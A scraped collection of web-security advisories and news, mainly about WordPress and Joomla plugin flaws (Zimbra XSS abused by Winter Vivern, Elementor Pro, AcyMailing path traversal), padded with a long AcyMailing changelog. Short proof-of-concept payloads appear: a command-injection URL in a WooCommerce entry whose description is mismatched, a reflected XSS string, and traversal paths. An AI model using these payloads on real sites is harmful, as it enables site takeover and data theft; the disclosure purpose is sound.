The Redirection WordPress plugin before 1.1.4 does not add nonce verification in place when adding the redirect, which could allow attackers to add redirects via a CSRF attack.

CVE-2023-1330

The Solidres WordPress plugin through 0.9.4 does not sanitise and escape numerous parameter before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin

CVE-2023-1377

The Shopping Cart & eCommerce Store WordPress plugin before 5.4.3 does not validate HTTP requests, allowing authenticated users with admin privileges to perform LFI attacks.

CVE-2023-1124

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in DupeOff.Com DupeOff plugin <= 1.6 versions.

**Solution**

No patched version is available. Reported to the WordPress plugins team (on Feb 13, 2023).

Yash Kanchhal discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress DupeOff Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-26529: WordPress DupeOff plugin <= 1.6 - Cross Site Scripting (XSS) vulnerability - Patchstack

By Deeba Ahmed
Researchers have noted that attackers are targeting a medium-severity Zimbra vulnerability that the company patched in version 9.0.0 Patch 24, one year ago.
This is a post from HackRead.com Read the original post: Zimbra email platform vulnerability exploited to steal European govt emails

The cybersecurity researchers at Proofpoint have disclosed a new phishing campaign from the Russian APT group known as Winter Vivern, TA473, and UAC-0114. The group has been exploiting a vulnerability in Zimbra Collaboration software to hack the emails of government agencies in different European countries.

Although it is yet unproven which nation-state supports this APT group, security researchers believe that its activities are in alliance with the interests of Belarus and Russia.

For your information, Zimbra Collaboration is a business collaboration and email platform that allows users to send and receive emails, and manage contacts, calendars, and tasks. It can be used on-premise or in the cloud and is used by governments, educational institutions, service providers, and businesses.

**How Does the Group Target Victims?**

Winter Vivern’s modus operandi entails sending out phishing emails impersonating the target organizations or their parent organizations’ employees with political affiliation to the government.

These emails are sent from email IDs having compromised domains or hosted on vulnerable WordPress websites. The email message includes a link to a resource of the target organization’s official website.

The phishing email (Credit: Proofpoint)

However, this is a spoofed link as it redirects the recipient to a payload hosted on the attacker’s domain or a credential-stealing web page. This technique’s efficacy is now enhanced with a cross-site scripting vulnerability found in Zimbra.

**APT Group Exploiting Zimbra Vulnerability**

Zimbra is an open-source, on-premise and Cloud enabled business collaboration and email platform used by “hundreds of millions of mailboxes across 140 countries,” as per its website. The service is used by governments, educational institutions, service providers, and small to medium-sized businesses.

Proofpoint researchers noted that Winter Vivern is targeting the medium severity Zimbra vulnerability tracked as CVE-2022-27926, which Zimbra already patched in version 9.0.0 Patch 24, one year ago. The XSS flaws can allow threat actors to create links with appended code, which execute malware inside the browser when opened.

**Modus Operandi and Possible Dangers**

In the current campaign, the hackers target government agencies through vulnerable Zimbra installations/web interfaces and send phishing emails with links that exploit the XSS flaw and execute encoded JavaScript. When it is executed by the browser, a larger JavaScript payload is fetched from the attackers’ server and executed on the website in what’s called a cross-site request forgery attack. 

Attackers can now steal the victims’ usernames, passwords, and active CSRF tokens obtained from a cookie and transfer the information to their server. After obtaining login credentials and tokens, the malicious JavaScript uses hardcoded URLs to hijack the email portal.

“In some instances, researchers observed TA473 specifically targeting RoundCube webmail request tokens as well. This detailed focus on which webmail portal is being run by targeted European government entities indicates the level of reconnaissance that TA473 conducts before delivering phishing emails to organizations,” Proofpoint’s report read.

“These labour-intensive customized payloads allow actors to steal usernames, passwords, and store active session and CSRF tokens from cookies facilitating the login to publicly facing webmail portals belonging to NATO-aligned organizations,” Proofpoint noted.

**Who Are Vulnerable?**

Organizations that haven’t patched their Zimbra products in the past year are vulnerable to TA473 attacks. To prevent such attacks, it is important to restrict resources on publicly available webmail portals. This would prevent APT groups from engineering customized scripts that can steal credentials and log into the victim’s webmail accounts.

**Winter Vivern’s Past Victims**

The group’s past victims were located in India, Vietnam, Lithuania, Slovakia, and the Vatican. Sentinel Labs reported earlier in March that the group’s recent targets include Italian and Ukrainian Foreign Affairs ministries, Polish government agencies, Indian government officials, and telecommunication firms that support Ukraine in the war.

According to Proofpoint’s previous research, this group targeted elected government representatives in the US and their staffers.

1.  NATO Data Stolen in Cyberattack on Portugal
2.  Smartphones of NATO soldiers hacked by Russia
3.  Vulnerability found in NATO, EU-approved firewall
4.  NATO Probes Top Missile Firm MBDA Data Breach
5.  Russians hide Graphite malware in PowerPoint files

Zimbra email platform vulnerability exploited to steal European govt emails

Unknown threat actors are actively exploiting a recently patched security vulnerability in the Elementor Pro website builder plugin for WordPress.
The flaw, described as a case of broken access control, impacts versions 3.11.6 and earlier. It was addressed by the plugin maintainers in version 3.11.7 released on March 22.
"Improved code security enforcement in WooCommerce components," the

Web Security / Cyber Threat

Unknown threat actors are actively exploiting a recently patched security vulnerability in the Elementor Pro website builder plugin for WordPress.

The flaw, described as a case of broken access control, impacts versions 3.11.6 and earlier. It was addressed by the plugin maintainers in version 3.11.7 released on March 22.

"Improved code security enforcement in WooCommerce components," the Elementor said in its release notes. The premium plugin is estimated to be used on over 12 million sites.

Successful exploitation of the high-severity flaw allows an authenticated attacker to complete a takeover of a WordPress site that has WooCommerce enabled.

"This makes it possible for a malicious user to turn on the registration page (if disabled) and set the default user role to administrator so they can create an account that instantly has the administrator privileges," Patchstack said in an alert of March 30, 2023.

"After this, they are likely to either redirect the site to another malicious domain or upload a malicious plugin or backdoor to further exploit the site."

Credited with discovering and reporting the vulnerability on March 18, 2023, is NinTechNet security researcher Jerome Bruandet.

Patchstack further noted that the flaw is currently being abused in the wild from several IP addresses intending to upload arbitrary PHP and ZIP archive files.

Users of the Elementor Pro plugin are recommended to update to 3.11.7 or 3.12.0, which is the latest version, as soon as possible to mitigate potential threats.

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

The advisory comes over a year after the Essential Addons for Elementor plugin was found to contain a critical vulnerability that could result in the execution of arbitrary code on compromised websites.

Last week, WordPress issued auto-updates to remediate another critical bug in the WooCommerce Payments plugin that allowed unauthenticated attackers to gain administrator access to vulnerable sites.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Exploiting WordPress Elementor Pro Vulnerability: Millions of Sites at Risk!

WordPress WooCommerce plugin version 7.1.0 suffers from a remote code execution vulnerability.

    # Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)# Date: 2022-12-07# Author: Milad Karimi# Vendor Homepage: https://wordpress.org/plugins/woocommerce# Software Link: https://wordpress.org/plugins/woocommerce# Tested on: windows 10 , firefox# Version: 7.1.0# CVE : N/A# Description:simple, easy to use jQuery frontend to php backend that pings variousdevices and changes colors from green to red depending on if device isup or down.# PoC :http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.phphttp://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '<?php phpinfo(); ?>' >info.php# Vulnerabile code: 95: $classname $classname($post_id);   94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple');     92: ⇓ function save($post_id, $post)       93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type']));           92: ⇓ function save($post_id, $post)

WordPress WooCommerce 7.1.0 Remote Code Execution

WordPress WPForms plugin version 1.7.8 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS)# Date: 2022-12-05# Author: Milad karimi# Software Link: https://wordpress.org/plugins/wpforms-lite# Version: 1.7.8# Tested on: Windows 10# CVE: N/A1. Description:This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.2. Proof of Concept:https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script>

WordPress WPForms 1.7.8 Cross Site Scripting

AnyMailing Joomla Plugin is vulnerable to stored cross site scripting (XSS) in templates and emails of AcyMailing, exploitable without authentication when access is granted to the campaign's creation on front-office. This issue affects AnyMailing Joomla Plugin Enterprise in versions below 8.3.0.

*   **AcyMailing 5.10.18**
    
    December 10, 2020
    
    **Improvements & fixes**
    
*   **AcyMailing 6.19.3**
    
    December 18, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.19.2**
    
    December 10, 2020
    
    **Improvements**
    
    *   New button to be redirected on the wordpress support of AcyMailing
    
    **Bug fixes**
    
*   **AcyMailing 6.19.1**
    
    December 9, 2020
    
    **Bug fixes**
    
*   **AcyMailing 5.10.17**
    
    December 2, 2020
    
    **Improvements & fixes**
    
*   **AcyMailing 6.19.0**
    
    December 1, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.18.2**
    
    November 12, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.18.0**
    
    November 9, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.17.1**
    
    October 28, 2020
    
    **Bug fixes**
    
    *   Fixed date for scheduled campaign showing with the timezone
    
*   **AcyMailing 6.17.0**
    
    October 19, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 5.10.16**
    
    October 15, 2020
    
    **Features**
    
    *   A new plugin lets you restrict the available fields when importing users from the front-end
    
    **Improvements & fixes**
    
*   **AcyMailing 6.16.4**
    
    October 8, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.16.3**
    
    October 7, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.16.2**
    
    October 1, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.16.1**
    
    September 29, 2020
    
    **Bug fixes**
    
    *   Hide php warning from other plugins
    
*   **AcyMailing 6.16.0**
    
    September 28, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.15.1**
    
    Septempber 9, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.15.0**
    
    September 7, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.14.1**
    
    August 19, 2020
    
    **Improvements**
    
    *   Remove check version in the starter version
    
    **Bug fixes**
    
*   **AcyMailing 6.14.0**
    
    August 17, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 5.10.15**
    
    August 7, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.13.3**
    
    August 3, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.13.2**
    
    July 30, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.13.1**
    
    July 29, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.13.0**
    
    July 27, 2020
    
    **New features**
    
    *   New design and UX for listing toolbar
    *   Added the possibility to create a list on the import in the list selection modal
    *   Added settings for the following add-ons: article, DOCman, DPcalendar, Easyblog, Easyprofile, EventBooking, FlexiContent, Hikashop, ICagenda, JDownloads, JEvent, K2, RSEventPro, RSS, Seblod, Virtumart
    *   Added settings for the following add-ons: post, page, RSS, The Event Calendar, Woocommerce
    *   New Giphy integration in the drag and drop editor
    *   Added the possibility to create custom view for each add-on to override the content inserted in the drag and drop editor
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.12.1**
    
    July 27, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.12.0**
    
    July 6, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.11.1**
    
    June 17, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.11.0**
    
    June 15, 2020
    
    **New features****Improvements**
    
    *   You can now add a message at the beginning of emails sent as tests
    *   Better display for the dynamic content insertion options (insertion of site articles in an email for example)
    *   The emails listing has been re-made: the "Campaigns" menu is renamed into "Emails" and the listing show four types of email
    *   The user listing has been improved, the data is displayed in a better way, and you can filter users by subscription
    *   The email creation has been improved, you can now pre-select the type of email you want to create (campaign / auto / scheduled / welcome / unsubscribe)
    *   You can now Unsubscribe / re-subscribe for all the lists at a time in the user edition page
    *   The bounce rule creation page has been improved and a presentation of the bounce handling feature has been added
    *   New export button on the lists listing to export subscribers
    *   The custom fields edition page has been redesigned and simplified
    *   The lists listing page has been improved and more information has been added
    *   New description field for lists, it will be added on the profile page as a tooltip in a future release
    *   The user "Source" is now easier to understand
    *   Cancel buttons added in various locations (import / export / mail edition...)
    *   New full translation in Japanese, Lithuanian, Spanish
    *   More translations in Catalan, Czech, Dutch, German, German (Switzerland), Norwegian (Bokmål), Polish, Romanian, Slovenian, Swedish
    
    **Bug fixes**
    
*   **AcyMailing 6.10.4**
    
    May 13, 2020
    
    **Improvements**
    
    *   PHP 7.4 compatibility
    *   Much easier way to attach a site with a license in the configuration
    *   The length of the "Email preview line" option is now limited to 255 characters
    *   The "Every week on Monday, Friday" trigger now takes the site's timezone into account in automations and periodic campaigns
    *   New security added on the custom fields names and unique code generation
    *   Better custom fields migration from the v5
    *   The shared servers email addresses are now handled in the bounce handling
    *   A new "revealonline" CSS class is now available, to hide something in the receiver's mailbox and show it on the online version
    *   New full Serbian translation
    *   Translation update and corrections for Danish, German, Finnish, French, Norwegian, Romanian, Russian, Slovenian, Swedish, Turkish and Ukrainian
    
    **Bug fixes**
    
*   **AcyMailing 5.10.14**
    
    May 13, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.10.2**
    
    April 21, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.10.1**
    
    April 7, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.10.0**
    
    April 6, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.9.2**
    
    March 23, 2020
    
    Vulnerability on file upload fixed when having admin access to AcyMailing pages. Any wrong file uploaded will be cleaned during the update process.  
    We strongly recommend to update AcyMailing as soon as possible, more information will be added in the related CVE
    
    **Bug fixes**
    
*   **AcyMailing 6.9**
    
    March 9, 2020
    
    **Improvements**
    
    *   The user import choices are now stored
    *   Greatly improved performances on the click tracking system, emails should be sent much faster
    *   Added the "hideonline" CSS class on emails. When added on an element, it will be hidden on the archive and "View it online" link
    *   Added the click statistics on the campaigns listing
    *   The detailed statistics are now no longer ordered randomly if the sending date is the same for every user
    *   You can now search multiple words in the dropdown fields (like the mail selection dropdown in the statistics page)
    *   Improved the "Check database integrity" feature to clean data from some AcyMailing tables, and translate result
    *   Improved the way custom fields are displayed when inserted in an email, for dropdown, radio and checkbox fields
    *   The welcome email is now not sent when the user isn’t active
    *   Better display for the "Send settings" step of campaigns
    *   Queued emails are now automatically removed for inactive users two days after the sending date
    *   \[addon\] New add-on for ICagenda, event insertion and user filter by event subscription
    *   \[addon\] Added compatibility with HikaShop 4
    *   Added multi-language compatibility when inserting articles in emails (for the link applied on the title)
    *   Tracked links are not processed by the sef system anymore, for special sef extension compatibility
    *   Improved the router for a better compatibility with the Joomla sef system on unsubscribe and online links, for multi-language sites
    *   AcyMailing will now instantly know it when you attached your website to your license when trying to update in WordPress
    *   A better url is used for the "Terms and conditions" post
    *   Code adaptation for WordPress standards
    *   Added compatibility with the plugin Schema and structured data for wp
    *   More translations for Chinese, Norwegian, Romanian, Slovenian
    *   Full Swedish translation
    
    **Bug fixes**
    
*   **AcyMailing 5.10.13**
    
    March 3, 2020
    
    **Modifications**
    
*   **AcyMailing 6.8**
    
    February 3, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.7**
    
    January 13, 2020
    
    **New features****Improvements**
    
    *   Editor: auto-hide the test zone if the email is successfully sent
    *   Editor: the title is now added on inserted images
    *   Editor: when inserting a separator, a new option lets you add some space below and above
    *   Editor: the drag & drop editor now opens in full screen mode
    *   Better interface for the "Test" step of the Campaign's edition page
    *   Improved the AcyMailing left menu when the window is resized
    *   Improved the AcyMailing header's display on small screens and tablets
    *   "Cancel" buttons have been added on multiple edition pages (List, user, bounce rule, custom field...)
    *   The add-ons are now ordered alphabetically for an easier search
    *   Improved performances on style and script loading for each AcyMailing page
    *   The FontAwesome library isn't loaded anymore, used fonts are now embed in AcyMailing to improve the page load speed
    *   New option in the mail configuration to disable automatic hyphens in paragraphs for sent emails
    *   New option to show the site's header on the unsubscribe page
    *   The "Bounce email address" option is now available in the free version in the "Mail settings" tab of the configuration
    *   In the bounce handling system, you can now connect to a mailbox using the "Pop3 without imap extension" method
    *   The "source" is automatically completed when a new AcyMailing user is created
    *   Automations: added a confirmation when deleting an email in the "Add an email in the queue" action
    *   Translation improvements: German, French, Hungarian, Norwegian, Russian, Turkish, Ukrainian
    *   New full translation: Slovenian
    
    **Bug fixes**
    
*   **AcyMailing 5.10.12**
    
    January 10, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.6.0**
    
    December 2, 2019
    
    **New features****Improvements**
    
    *   All the add-ons now have options for the automatic campaigns to automatically send the new content to your users
    *   Better alignment for Follow buttons in Outlook 2007 - 2010
    *   Better UX for the list's edition page
    *   The shown statistics numbers are now consistent in the campaigns listing and the statistics page
    *   In some mail clients, a 1px border may appear around your emails, this is no longer the case
    *   The mobile preview has been inproved, and no more double scrollbar
    *   The default templates have been remade to include this version's improvements
    *   The campaign's settings are now applied on the dynamic content inserted in your emails (like the site's articles/posts)
    *   Improved the campaigns edition page display and removed the hint popup
    *   Compatibility with the GDPR plugin
    *   The Add-ons menu is now translated in the Joomla menu
    *   The "Price text" field is now taken into account in the EventBooking add-on
    *   New partial translations, imported from AcyMailing 5: Arabic, Bosnian, Bulgarian, Catalan, Chinese, Croatian, Estonian, Finnish, Galician, Hebrew, Icelandic, Indonesian, Japanese, Latvian, Lithuanian, Macedonian, Persian, Serbian, Sindhi, Swahili, Thai, Urdu, Vietnamese, Welsh
    
    **Bug fixes**
    
*   **AcyMailing 5.10.11**
    
    November 27, 2019
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.5.0**
    
    November 5, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.4.0**
    
    October 14, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.3.1**
    
    September 25, 2019
    
    **Bug fixes**
    
*   **AcyMailing 6.3.0**
    
    September 23, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.2.2**
    
    August 30, 2019
    
    This is a patch release to address a security issue on the file upload custom field. We highly recommend to update to the v6.2.2 as soon as possible for websites matching all of the following conditions:
    
    *   The Enterprise edition of AcyMailing is used
    *   The version 6.2.0 or 6.2.1 is used
    *   A "File" custom field is created and visible for the users in a front-end subscription form (the module on Joomla or the widget on WordPress)
    *   An other custom field other than a "File" field must be displayed on the form, in addition to the "Name", "Email" and "File" fields
    
    If your website doesn't match one of these conditions it is not concerned by the security issue, but we still recommend you to keep AcyMailing updated when a new version is available.
    
*   **AcyMailing 5.10.10**
    
    August 28, 2019
    
    **Improvements and bug fixes**
    
*   **AcyMailing 6.2.1**
    
    August 27, 2019
    
    **Improvements and bug fixes**
    
*   **AcyMailing 6.2.0**
    
    August 20, 2019
    
    **New features and improvements****Bug fixes**
    
*   **AcyMailing 6.1.10**
    
    August 5, 2019
    
    **Bug fixes**
    
*   **AcyMailing 5.10.9**
    
    July 31, 2019
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.1.9**
    
    July 30, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.1.8**
    
    July 15, 2019
    
    There aren't much modifications in this version, but it had to be released as the "Send settings" step of the campaigns edition workflow could be blocked in some cases when scheduling the campaign, saving as draft then returning on this step.
    
    **Modifications**
    
*   **AcyMailing 6.1.7**
    
    July 8, 2019
    
    **Improvements****Bug fixes****Integrations**
    
*   **AcyMailing 6.1.6**
    
    June 18, 2019
    
    This version is mainly an improvements and maintenance release, mainly focusing on the editor and sent emails.
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 5.10.8**
    
    June 18, 2019
    
    **Improvements****Bug fixes****Plugins**
    
*   **AcyMailing 6.1.5**
    
    June 3, 2019
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.1.4**
    
    April 23, 2019
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.1.3**
    
    April 2, 2019
    
*   **AcyMailing 5.10.7**
    
    March 25, 2019
    
*   **AcyMailing 5.10.6**
    
    March 18, 2019
    
*   **AcyMailing 6.1.2**
    
    March 11, 2019
    
*   **AcyMailing 6.1.1**
    
    February 13, 2019
    
*   **AcyMailing 6.0.4**
    
    February 6, 2019
    
*   **AcyMailing 5.10.5**
    
    January 10, 2019
    
*   **AcyMailing 6.0.3**
    
    January 9, 2019
    
*   **AcyMailing 6.0.2**
    
    December 17, 2018
    
*   **AcyMailing 6.0.1**
    
    November 28, 2018
    
*   **AcyMailing 6 Beta**
    
    November 19, 2018
    
*   **AcyMailing 6 Alpha 3**
    
    October 2, 2018
    
*   **AcyMailing 6 Alpha 2**
    
    August 29, 2018
    
*   **AcyMailing 6 Alpha 1**
    
    August 22, 2018

CVE-2023-28733: Changelog - AcyMailing

Missing access control in AnyMailing Joomla Plugin allows to list and access files containing sensitive information from the plugin itself and access to system files via path traversal, when being granted access to the campaign's creation on front-office. This issue affects AnyMailing Joomla Plugin in versions below 8.3.0.

**Advisory CVE-2023-28732, Missing access control affecting the AcyMailing plugin for Joomla**

**CVE ID**: CVE-2023-28732 

**Vendor**: AcyMailing 

**Product**: Newsletter Plugin for Joomla 

**Title**: Missing access control affecting the AcyMailing plugin for Joomla 

**Vulnerable Versions**: < 8.3.0 

**Problem Type (CWE)**:  

*   CWE-20 Improper Input Validation 
*   CWE-200 Exposure of Sensitive Information to an Unauthorized Actor 

**Impacts (CAPEC)**:  

*   CAPEC-115 Authentication Bypass 
*   CAPEC-126 Path Traversal 

**CVSS 3.1**: 

*   6.5 Medium 
*   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 

**Source Repository (OSS)**: https://github.com/acyba/acymailing/  

**References**:  

*   https://www.acymailing.com/change-log/  
*   https://github.com/acyba/acymailing/releases/tag/v8.3.0 
*   https://www.bugbounty.ch/advisories/CVE-2023-28732  

**CVE Description**: 

Introduction: 

AcyMailing is a newsletter and email marketing plugin available for Joomla and WordPress. 

The vulnerability: 

Missing access control allows to list and access files containing sensitive information from the plugin itself and access to system files due to path traversal, when being granted access to the campaign’s creation on front-office. 

This issue affects AnyMailing Joomla Plugin in versions below 8.3.0. 

The steps to exploit the vulnerability: 

*   Campaign creation access needs to be enabled on the front-office, the following steps can then be done unauthenticated 
*   Manipulate the URL to list and get access to the logs of the plugin itself, leaking PII of users 
*   Manipulate the URL to list and get access to system files (e.g. in the root directory of Joomla). Only allowed file-types can be listed and accessed 
*   Upload arbitrary files. Only allowed file-types can be uploaded 

How to check for exploitation: 

*   Check access logs for requests in the form of “/component/acym/frontfile.html?currentFolder=media/com\_acym/upload/logs” or suspicious access to files in “/media/com\_acym/upload/logs/” 
*   Check access logs for requests in the form of “/component/acym/frontfile.html?currentFolder=media/com\_acym/upload/logs/../../../..” or suspicious access to allowed file-types on the entire system accessible by the user of the webserver 
*   Check for suspicious files uploaded in /media/com\_acym/upload/ 
*   Default allowed file-types are: zip, doc, docx, pdf, xls, txt, gzip, rar, jpg, jpeg, gif, xlsx, pps, csv, bmp, ico, odg, odp, ods, odt, png, ppt, swf, xcf, mp3, wma 

**Solution**: 

*   update to a fixed version (>= 8.3.0) 

**Timeline**: 

*   2023-02-01: reported 
*   2023-03-09: initial vendor notification 
*   2023-03-10: initial vendor response 
*   2023-03-20: release of fixed version 
*   2023-03-30: coordinated public disclosure 

**Credits**: 

*   Reporter: Raphaël Arrouas (“Xel”), on a bug bounty program of Bug Bounty Switzerland 
*   Coordinator: Bug Bounty Switzerland 

Diese Website verwendet Cookies, um Ihr Nutzererlebnis zu verbessern. Wir gehen davon aus, dass Sie damit einverstanden sind. Wenn nicht können sie die Cookie Einstellungen anpassen.  

  
  
Akzeptieren

Tag

#wordpress